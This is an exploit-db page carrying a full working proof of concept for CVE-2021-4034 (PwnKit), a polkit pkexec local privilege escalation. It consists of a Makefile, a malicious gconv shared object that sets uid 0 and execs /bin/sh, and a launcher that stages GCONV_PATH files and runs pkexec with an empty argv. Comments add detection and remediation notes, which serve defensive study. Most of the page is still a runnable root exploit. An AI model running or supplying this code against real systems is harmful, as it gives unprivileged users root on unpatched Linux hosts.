PolicyKit-1 0.105-31 – Privilege Escalation

  • 作者: Lance Biggerstaff
    日期: 2022-01-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50689/
  • # Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation
    # Exploit Author: Lance Biggerstaff
    # Original Author: ryaagard (https://github.com/ryaagard)
    # Date: 27-01-2022
    # Github Repo: https://github.com/ryaagard/CVE-2021-4034
    # References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
    
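    # Description: This proof of concept for CVE-2021-4034 (PwnKit), a local privilege escalation in polkit's pkexec, consists of three files: `Makefile`, `evil-so.c` and `exploit.c`. The Qualys advisory referenced above describes the flaw and its remediation.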
    
    ##### Makefile #####
    
    # Default target. Builds the two artefacts the PoC uses:
    #   evil.so  - shared object compiled from evil-so.c as position-independent
    #              code (-shared -fPIC)
    #   exploit  - launcher binary compiled from exploit.c
    all:
    	gcc -shared -o evil.so -fPIC evil-so.c
    	gcc exploit.c -o exploit
    
    # Removes what the build and a run of `exploit` leave in the working
    # directory: the directory literally named "GCONV_PATH=." (created by
    # exploit.c), the directory evildir, and the two build outputs.
    # The commands are chained with &&, so if an earlier rm fails the later
    # ones are skipped and those files stay on disk.
    # For triage: a directory whose name begins with "GCONV_PATH=" is an
    # unusual on-disk artefact and a useful search term on a suspect host.
    clean:
    	rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so
    
    #################
    
    ##### evil-so.c #####
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    /* Empty stub: the function has no body and does nothing when called.
     * NOTE(review): glibc character-set conversion modules export a gconv()
     * symbol, so this is presumably here only to make evil.so look like such
     * a module to the loader -- confirm against the glibc gconv interface. */
    void gconv() {}
    
    /*
     * Initialisation hook of the shared object. glibc calls a conversion
     * module's gconv_init() when it loads the module, so this body runs inside
     * whichever process loaded evil.so; in this PoC that process is the one
     * started by exploit.c (pkexec).
     *
     * The function requests uid 0 and gid 0, calls setgroups(0), and then
     * replaces the process image with /bin/sh. No return value is checked and
     * the function only returns if execve() fails.
     *
     * Defender view: the observable result is /bin/sh running as uid 0 in a
     * process that was started as pkexec by an unprivileged user. Process
     * lineage rules of the form "pkexec -> shell with no polkit authorisation"
     * cover this payload regardless of the file names used.
     */
    void gconv_init() {
    /* Only succeed when the loading process is already privileged (e.g. a
     * setuid-root binary); in an ordinary process these calls fail. */
    setuid(0);
    setgid(0);
    setgroups(0);
    
    /* Shell is started with NULL argv and NULL envp. */
    execve("/bin/sh", NULL, NULL);
    }
    
    #################
    
    ##### exploit.c #####
    
    #include <stdio.h>
    #include <stdlib.h>
    
    /* Path of the target binary. pkexec is normally installed setuid-root,
     * which is why a flaw in its startup code is a privilege escalation. */
    #define BIN "/usr/bin/pkexec"
    /* Name used for the staging directory, for the file created inside
     * "GCONV_PATH=.", and for the first environment entry passed to pkexec. */
    #define DIR "evildir"
    /* Base name of the shared object (evil.so) and of the module named in the
     * generated gconv-modules file. */
    #define EVILSO "evil"
    
    /*
     * Launcher for the CVE-2021-4034 (PwnKit) proof of concept.
     *
     * Stages files in the current working directory through system(), then
     * execs pkexec with an empty argument vector and a hand-built environment.
     * None of the system() or execve() return values are checked; the final
     * `return 0` is reached only if execve() itself fails.
     *
     * Notes for defenders:
     *  - An execve of /usr/bin/pkexec with argc == 0 is not something normal
     *    callers produce. Exec telemetry that records the argument count
     *    (for example audit EXECVE records) can alert on it directly.
     *  - On-disk artefacts of this PoC: a directory named "GCONV_PATH=.", a
     *    directory "evildir" holding a gconv-modules file and a .so, all in
     *    the invoking user's working directory.
     *  - SHELL is set to a value that is not a shell path; per the Qualys
     *    advisory referenced in the page header, this technique leaves a
     *    pkexec complaint about the SHELL value in the system log.
     *  - Remediation per the same advisory: install the vendor's fixed polkit
     *    package; where that is not yet possible, removing the setuid bit
     *    from pkexec is the interim mitigation.
     */
    int main()
    {
    /* Environment handed to pkexec. The first entry is the bare string
     * "evildir" with no '=' in it. PATH points at the directory named
     * "GCONV_PATH=.". CHARSET names the character set that the generated
     * gconv-modules file (below) maps to the evil module. */
    char *envp[] = {
    DIR,
    "PATH=GCONV_PATH=.",
    "SHELL=ryaagard",
    "CHARSET=ryaagard",
    NULL
    };
    /* Empty argument vector: the target starts with argc == 0, the condition
     * the CVE-2021-4034 advisory identifies as mishandled by pkexec. */
    char *argv[] = { NULL };
    
    /* Create a directory whose name is the literal string "GCONV_PATH=.". */
    system("mkdir GCONV_PATH=.");
    /* Create a file named evildir inside it and make it mode 777. */
    system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
    /* Create the staging directory evildir in the working directory. */
    system("mkdir " DIR);
    /* Write evildir/gconv-modules: one tab-separated "module" line tying the
     * charset name "ryaagard//" to the module base name "evil". */
    system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
    /* Copy the compiled shared object next to that gconv-modules file. */
    system("cp " EVILSO ".so " DIR);
    
    /* Replace this process with pkexec using the empty argv and the crafted
     * environment above. */
    execve(BIN, argv, envp);
    
    return 0;
    }
    
    #################